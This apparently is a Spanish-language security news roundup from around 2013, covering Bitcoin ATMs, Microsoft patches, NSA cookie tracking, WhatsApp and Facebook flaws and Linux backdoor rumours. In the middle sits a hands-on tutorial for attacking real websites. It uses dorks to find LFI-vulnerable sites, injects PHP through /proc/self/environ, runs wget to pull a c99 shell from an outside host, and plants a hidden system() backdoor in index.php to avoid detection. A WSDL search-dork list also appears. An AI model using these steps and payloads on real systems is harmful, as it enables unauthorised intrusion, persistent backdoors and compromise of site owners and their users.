La volátil moneda no ha sido regulada aún por ningún gobierno en el mundo, y ha cobrado cierta notoriedad por haber sido usada en el tráfico de drogas.

Alemania se convirtió en el primer país del mundo este año en declarar los bitcoins una "moneda privada", un estatus que permite gravar las transacciones que se realicen con ellas.

En Vancouver los bitcoins son aceptados por una quincena de negocios, desde cafés hasta empresas de paisajismo.

Esta moneda es cada vez más común en ciudades como Berlín y San Francisco, e incluso en Argentina, y son aceptadas por compañías de internet como Wordpress.

David Lowy, un empresario que usó su teléfono inteligente para transferir .0101 bitcoins al camarero del café Waves para pagar una taza de café, equivalente a 2 dólares canadienses, dijo que Vancouver era una buena candidata para el primer cajero automático de la moneda, porque la ciudad es popular entre los empresarios de internet.

Uno de los primeros usuarios del cajero fue Mike Yeung, un estudiante de negocios en la universidad Simon Fraser, donde ayudó a crear el club universitario de bitcoin, uno de los varios grupos de ese estilo en el mundo.

El objetivo del club es "educar a la gente acerca de bitcoin para que lo puedan introducir en su vida diaria", dice. "Creo que los bitcoins son el futuro, porque garantizan máximo valor y eficiencia", explica Yeung.

Una vez que los bitcoins tengan un uso más fluido, predice Yeung, podrán usarse para transferir dinero de forma económica alrededor del mundo, de la misma manera que internet permite a las personas comunicarse de un lugar a otro con aplicaciones como Skype.

Señala la nueva máquina en la pared del café: "Este cajero automático es un paso adelante", dice.

Fuente: Infobae

Vulnerabilidades 0 day que se están explotando In-the-Wild

Este mes se publicaron ocho boletines de seguridad de Microsoft, de MS13-096 a MS13-106. Cinco de ellos están clasificados como "Críticos" y otros seis como "Importantes". Las prioridades de este mes son las vulnerabilidades críticas de GDI+ (MS13-096), Internet Explorer (MS13-097) y Scripting Runtime (MS13-096).

Muchas vulnerabilidades se han estado explotando en ataques dirigidos en todo el mundo, y una de ellas lo ha estado haciendo por al menos seis meses.

La actualización de GDI+ parcha una vulnerabilidad de corrupción de memoria, CVE-2013-3906, que detectamos como Exploit.Win32.CVE-2013-3906.a. Hemos visto unas cuantas variantes de ITW explotándose como un archivo TIFF deforme, que distribuye puertas traseras como Citadel, el bot BlackEnergy, PlugX, Taidoor, Janicab, Solar y Hannover. El perfil de sus blancos de ataque y la distribución de sus paquetes de herramientas indican que varios cibercriminales tienen control de este exploit desde julio y que la amenaza cuenta con una extensa cadena de distribución que lo repartió por todo el mundo. Tomando en consideración su variedad de usos y fuentes, esta vulnerabilidad podría reemplazar a cve-2012-0158 en cuestión de volumen general de ataques dirigidos.

El boletín de Internet Explorer enmienda siete diferentes vulnerabilidades de elevación de privilegio y corrupción de memoria, que afectan de Internet Explorer 6 en Windows XP SP 3 a Internet Explorer 11 en Windows Server 2012 R2 y Windows RT 8.1. Creemos que pronto se verán exploits para algunas de estas vulnerabilidades a la venta en paquetes de exploits.

Por último, existe otra vulnerabilidad crítica en Windows Scripting Engine y una vulnerabilidad "use after free" más, que por desgracia permite la ejecución remota de código a través de cada versión de Windows existente y puede atacarse mediante cualquiera de los navegadores más comunes. ¡Instalen los parches!

Fuente: Viruslist

NSA utiliza las cookies para espiar

La Agencia de Seguridad Nacional (NSA, por sus siglas en inglés) de Estados Unidos recurre a las «cookies» de Google para consultar la actividad previa del usuario y conocer sus gustos —como hacen los anunciantes de Internet—, con el fin último de identificar los objetivos a espiar.

Según una investigación del diario estadounidense «The Washington Post», unas diapositivas de la NSA proporcionadas por el excontratista de la NSA Edward Snowden confirmarían que la agencia está utilizando estas técnicas de rastreo para identificar objetivos a "hackear" y reforzar la vigilancia.

Durante años, los defensores de la privacidad en Internet han expresado su preocupación por el uso de las herramientas de seguimiento comerciales que se usan para identificar y dirigirse a los consumidores con determinados anuncios. La industria, por su parte, responde que supone un beneficio para los consumidores al proporcionarles anuncios de su interés .

Según los citados documentos, la NSA y el GCHQ (la agencia de inteligencia del Reino Unido) han encontrado "un uso particular" para un mecanismo de seguimiento específico de Google, conocido como la "cookie" PREF, que no suele contener información personal, como el nombre de una persona o su dirección de correo electrónico, pero que incluye códigos numéricos que permiten identificar el navegador de un usuario.

Además del seguimiento, esta «cookie» permitiría aislar las comunicaciones de una persona entre el mar de datos de Internet con el objetivo de enviar un software capaz de "hackear" la computadora de esa persona. Unos ataques específicos que, sin embargo, no estarían detallados en los documentos filtrados.

Según ha resaltado el diario, la NSA utilizaría esta técnica para seguir a personas bajo sospecha o, incluso, para localizarles a través de la conexión a Internet de su terminal móvil, rastreando la ubicación de cada dispositivo. Los expertos consultados por este medio afirman que en las diapositivas no se especifica si existe un cooperación por parte de Google, aunque advierten de que si la NSA obtiene los datos de esa manera y las empresas conocen sus movimientos, están legalmente obligadas a denunciarlo.

Fuente: Hackplayers

Cualquiera puede leer tus conversaciones de WhatsApp

Cualquier persona puede leer tus conversaciones de WhatsApp. Lo revela un análisis exhaustivo de protocolo, sistema de seguridad y métodos usados por la compañía para enviar y recibir mensajes.

Tus conversaciones de WhatsApp pueden ser leídas. Así de simple pero así de contundente. Da igual si el contenido ahora está cifrado. No es una cuestión de posibilidades, ni una teoría, es una realidad y se puede hacer con las últimas versiones de la aplicación. No es la primera vez que sucede y estoy convencido de que no será la única. WhatsApp es una compañía irresponsable que simplemente se niega a mejorar sus sistemas de seguridad aun cuando son tan populares que se los considera responsables directos de la desaparición del SMS.

Thijs Alkemade, un estudiante de ingeniería de sistemas y matemáticas en la Universidad de Utrecht ha analizado a detalle el sistema de cifrado que usa WhatsApp, los aspectos técnicos del funcionamiento de la aplicación y cómo dos errores en la implementación hacen que una persona con suficiente conocimiento técnico y acceso a la misma red a la que estás conectado (por ejemplo, a la misma red Wi-Fi) sea capaz de interceptar mensajes que envías y recibes, romper el cifrado y leerlos. WhatsApp Sniffer fue la app más popular en su momento.

En términos simples y sencillos: debes asumir que si una persona tiene el suficiente interés de leer tus mensajes de WhatsApp, puede hacerlo. Ya sea por conocimiento propio o por medio de un tercero que lo tenga. El pensamiento inmediato suele ser «¿Quién estaría interesado en leer mis mensajes?» pero recordemos que, por vulnerabilidades como esta, han aparecido aplicaciones que hacen el trabajo sucio por ti y se empiezan a espiar todos los textos intercambiados en una misma red Wi-Fi de forma automática. Pero si además usas WhatsApp para trabajo, te estás disparando en el pie. Pero si lo usas para intercambiar información privilegiada o sensible, deberías ser despedido inmediatamente por irresponsable extremo.

¿Por qué WhatsApp es tan inseguro?

Es la pregunta que muchos nos hacemos constantemente considerando el alcance y la inmensa popularidad que tiene el servicio. Ahora mismo la compañía detrás de la aplicación tiene, básicamente, el mismo poder que una operadora telefónica pero sin estar bajo las mismas regulaciones. Por lo cual, aparentemente, dan poca prioridad o tienen poco interés en cumplir con una responsabilidad de mantener seguro el intercambio de información entre sus usuarios. WhatsApp ya no es gratis. Sí, de acuerdo, es un servicio de dos dólares al año, pero al pedir dinero —por muy bajo que sea— estás cobrando por tu servicio, lo mínimo que se debería ofrecer es seguridad decente. Especialmente considerando que hay otros servicios similares que ofrecen una mejor seguridad. Hoy WhatsApp es el rey, pero hace 4 años BlackBerry Messenger lo era, en estas épocas cambiar de app para mensajear es muy muy simple.

Seguramente WhatsApp hará correcciones a las aplicaciones y al protocolo de comunicación para mejorar su seguridad, la pregunta que siempre quedará ahí: ¿Es suficiente? Lo peor del caso es que del lado del usuario no hay solución inmediata. No puedes hacer nada para que tus conversaciones de WhatsApp sean más seguras. ¿Mi consejo? Deja de usarlo, hoy mismo.

Fuente: Alt1040

Explotar LFI, Subir Shell Explotando /proc/self/environ y Backdorizar

Intrusion LFI php://input
tutorial de otro metodo para conseguir subir una shell por medio de LFI
utilizando inyecciones de codigo en php atraves de una vulnerabilidad en el /proc/self/environ

Empecemos:

Primero Buscamos con un dork alguna web Vulnerable a LFI

Dork:

inurl:*.php?page=* site:.com.co

Vamos probando hasta encontrar una q al incluir /etc/passwd nos muestra su contenido
En este caso:

http://sitiovulnerable/index.php?page=/etc/passwd

Damos como parametro a incluir /proc/self/environ y vemos el siguien resultado

http://sitiovulnerable/index.php?page=/proc/self/environ


Nos vamos a Mozilla Firefox y abrimos el addon Tamper Data:

Damos clik en Start Tamper y volvemos a realizar la Peticion al sitio web


Desactivamos la casilla "Continue Tampering" y Damos Click en Tamper, modificamos el Parametro User-Agent intrudiciendo algun Codigo php, de Prueba, Yo intentare con <? System('ls'); ?> para ver si logramos listar el contenido de host.



Damos Click en OK y vemos q el codigo php se ejecuta correctamente y lista los archivos y directorios de la web Vulnerable:



Ahora Sabemos que se puede ejecutar Codigo Shell atraves de php con el comando system,exec,etc (si no funcionace reciviriamos un mensaje diciendo q la funcion system() a sido deshabilitada por razones de seguridad)

Subiremos Nuestra Shell, de la siguiente forma.

Abriremos Tamper Data y comensaremos a Capturar.
Repetiremos la Peticion al host:
http://sitiovulnerable/index.php?page=/proc/self/environ
Modificaremos el Parametro User-Agent para que ejecute Wget y descarge una shell en txt de donde sea que este alojada con el siguiente codigo php

<? system('wget http://SitioDeLaShell/shell.txt'); ?>



Repetimos la Operacion Con Tamper Data y Comprobamos q nuestra shell se subio correctamente pasando como parametro en User-Agent

<? system('ls'); ?>

Vemos que dentro de la lista de archivos del host aparece nuestra shell



Convertiremos Nuestro txt, en un archivo php, repitiendo la operacion con Tamper Data y pasando como Parametro de User-Agent

<? system('mv c99.txt s.php'); ?>

Una ves Hecho Esto repetimos el procedimiento con tamper data para listar nuestros archivos, para ver si el proceso anterior Termino Correctamente:

<? system('ls'); ?>



Como vemos el archivo fue Renombrado Correctamente, solo nos queda vistar nuestro archivo por medio de la URL

http://sitiovulerable/s.php



Como vemos la ejecucion de la shellphp, se ejecuto Correctamente. Como es un Sitio Importante y no queremos q nos detecten, introduciremos un backdoor dentro del codigo de algun archivo, yo elegi index.php



Les Dejo el code del backdoor que arme:

<?php
if($_GET['active']=='si'){
system( $_GET['c']);
}
?>

Lo Introduciremos dentro de index.php y al llamarlo desde

http://SitioVulnerable/index.php?c=ls&active=si

nos mostrara el resultado de la ejecucion del parametro q pasemos.



Solo nos queda Eliminar s.php con el comando rm s.php por medio de nuestro backdoor

http://SitioVulnerable/index.php?c=rm s.php&active=si

Listamos el Contenido del Host

http://SitioVulnerable/index.php?c=ls&active=si

Twitter también implementará Perfect Forward Secrecy (PFS)

El protocolo es recomendado por la Electronic Frontier Foundation y en Twitter ya adelantaron que ralentizará un poco el servicio.

En vista de las recientes revelaciones del espionaje de las agencias de seguridad norteamericanas sobre prácticamente casi toda la industria tecnológica, Twitter anunció que su servicio cambiará sus estándares de cifrado utilizando un nuevo protocolo de seguridad.

Este protocolo, recomendado por muchos expertos en el área como la EFF (Electronic Frontier Foundation), es conocido como Perfect Forward Secrecy.

La EFF explica el funcionamiento de la siguiente forma: Con el cifrado estándar HTTPS la llave (o clave) para desencriptar la información está almacenada en el servidor, lo que significa que una agencia de seguridad como la NSA puede capturar toda la información y simplemente esperar hasta que llegue el día que obtenga la llave para descifrar toda esta información.

Sin embargo, el protocolo Perfect Forward Secrecy (que se implementaría encima de HTPPS) consistiría en el fondo en generar una llave nueva para cada interacción, esperando así prevenir la captura pasiva de datos de la NSA.

El nuevo protocolo requerirá una arquitectura de servidores un poco más compleja, lo que dará como resultado un servicio quizá un poco más lento, pero Twitter cree que esta seguridad extra valdrá completamente la pena. Al fin y al cabo, aseguraron que debería ser un estándar y ya fue implementado por Google y Facebook.

Fuente: FayerWayer

Facebook permite ver la lista de amigos privada

Irene Abezgauz, un investigador de seguridad del Centro de investigación de Quotium ha encontrado una vulnerabilidad en Facebook que permite ver la lista de amigos de los usuarios, aunque el usuario haya establecido esa información como privada.

El exploit abusa de la función de "Personas que tal vez conozcas" en Facebook, que sugiere nuevos amigosen base a conexiones mutuas y otros criterios como la educación o el trabajo.

¡Este hack es muy sencillo! Lo que se tendría que hacer es crear un perfil falso de Facebook y luego enviar una solicitud de amistad a su objetivo. Incluso si el usuario objetivo nunca acepta la solicitud, el atacante puede ver la lista de amigos de esa persona a través de la función de "gente que tal vez conozcas".

Facebook dice que "un atacante no tienen forma de saber si los amigos sugeridos representan o no la lista completa del usuario. Puede ver cientos de sugerencias y no saber cuales son los reales, sólo es un 80%".
Por el momento, Facebook no ha reconocido el hallazgo. Entonces, ¿para qué establecer dicha lista como privada?

Fuente: HackerNews

Pentesting a servicos web: WSDL

"Web Services Description Language" (WSDL) es un lenguaje empleado en páginas web para informar a los clientes que el servidor dispone de una aplicación indicándole en que consiste el servicio que ofrece, mostrando cual es su función y como puede un cliente interactuar con ella. Esto lo hace a través de un archivo XML en donde se describe todo lo anterior.

WSDL esta pensado para facilitar la vida al administrador pudiendo añadir de manera amena nuevos servicios. La información que ofrece este archivo puede llegar a ser un tesoro. Con él se obtiene información sobre appwebs, su ubicación, como trabaja, puntos de entrada a la aplicación, posibles ataques de sql injection, ataques a paneles de autentificacion, ataques al parámetro SessionId, etc...

Un ejemplo para entenderlo mejor: http://tinyurl.com/knpx95z
Más información: http://di002.edv.uniovi.es/~falvarez/WSDL.pdf

Para encontrar ficheros WSDL basta con hacer un poco de hacking con buscadores:

• filetype:”wsdl”
• indexof:”/wsdl”
• inurl:wsdl
• inurl:”?wsdl”
• inurl:”.wsdl”
• inurl:”.aspx?wsdl”
• inurl:”.ascx?wsdl”
• inurl:”.asmx?wsdl”
• inurl:”.ashx?wsdl”
• inurl:”.jws?wsdl”
• inurl:”.svc?wsdl”
• filetype:wsdl wsdl

Y las que se te vayan ocurriendo. Una de las herramientas para este fin que más me ha sorprendido es WS-ATTACKER, actualizada hace unos meses, incorpora una cantidad de plugins muy interesantes.

 

 

 

Basta con indicar la ruta de un wsdl, configurando los parámetros, seleccionar los plugins que convegan y comenzar a testear.

Fuente: Dominio Hacker

 

¿Podría haber un backdoor en un sistema operativo de código abierto?

Que la NSA propuso a Linus Torvalds introducir una puerta trasera en Linux era un rumor que el propio creador del kernel ya reconoció en septiembre durante la conferencia LinuxCon. Ahora sin embargo ya es un hecho confirmado porque así se reveló durante la audiencia sobre la vigilancia de masas en el Parlamento Europeo de esta semana.

Nils Torvalds, padre de Linus y miembro del Parlamento Europeo de Finlandia, comentaba (minuto 3:09:06 del vídeo): "Cuando a mi hijo mayor le hicieron la misma pregunta: '¿te ha hecho la NSA alguna propuesta sobre backdoors', dijo 'No' , pero al mismo tiempo él asintió. Era una clase de libertad legal. Le había dado la respuesta correcta, [pero] todos entendieron que la NSA se había acercado a él".

La historia no nos dice todavía qué respondió Linus Torvalds a la NSA, pero supongo que les dijo que no sería capaz de inyectar puertas traseras, aunque quisiera, ya que el código fuente es abierto y todos los cambios son revisados por muchas personas independientes. Después de todo, esa es una de las ventajas del código fuente abierto y la razón por la que, en teoría, se podría confiar cuando se trata de seguridad.

Y digo en teoría porque en este mundo ya nadie se ríe y piensa que eres un paranoico si afirmas que, aun así, también podrían haber introducido un backdoor en Linux, aunque sea un sistema operativo de código abierto...

Descargar e instalar un paquete firmado de un sitio oficial sólo te garantiza de dónde viene y que no ha sido modificado en tránsito. Pero, ¿se puede confiar en que realmente haya sido compilado sin haberse modificado ningún fichero del repositorio público o se hayan introducido cambios reconocidos pero con funcionalidades adicionales ocultas?

Realmente la respuesta da un poco igual para la mayoría. Si lo piensas ¿quién descarga y compila el código de una distribución? Sólo algunos profesionales y entusiastas. Es más, aunque recompilen el código ¿cuantos lo han revisado? Seguramente no haya nadie o muy pocos que tengan la capacidad de analizar todos los componentes del sistema operativo.

Supongamos que alguien decide analizar exhaustivamente el código para verificarlo. Si recordáis hace poco en el blog hablábamos de una iniciativa de financiación colectiva sólo para auditar el código de Truecrypt. Imaginaros el coste de auditar una distribución Linux cuyo código es más de 10 veces mayor.

Pero vayamos un poco más allá. Pensemos por un momento que alguien asume la inversión y se lleva a cabo la revisión completa del código del sistema operativo. Lo lógico sería que la revisión se dividiera por partes ¿no sería factible controlar a una empresa o a algunos grupos de desarrolladores? Es más, ¿no sería posible ocultar un backdoor delante de sus narices?. Ya en 2003 se cambiaron en el kernel dos líneas de código que parecían un error tipográfico pero que al llamar la función sys_wait4 daban acceso como root...

Pensarlo por un momento. Yo amo a Linux porque ofrece más libertad y al menos te da la opción de revisar y modificar el código pero creo que sí sería posible introducir una puerta trasera en el sistema operativo, aunque sea de código abierto... ¿por qué si no la NSA se habría dirigido a Linus Torvalds?

Fuente: Hackplayers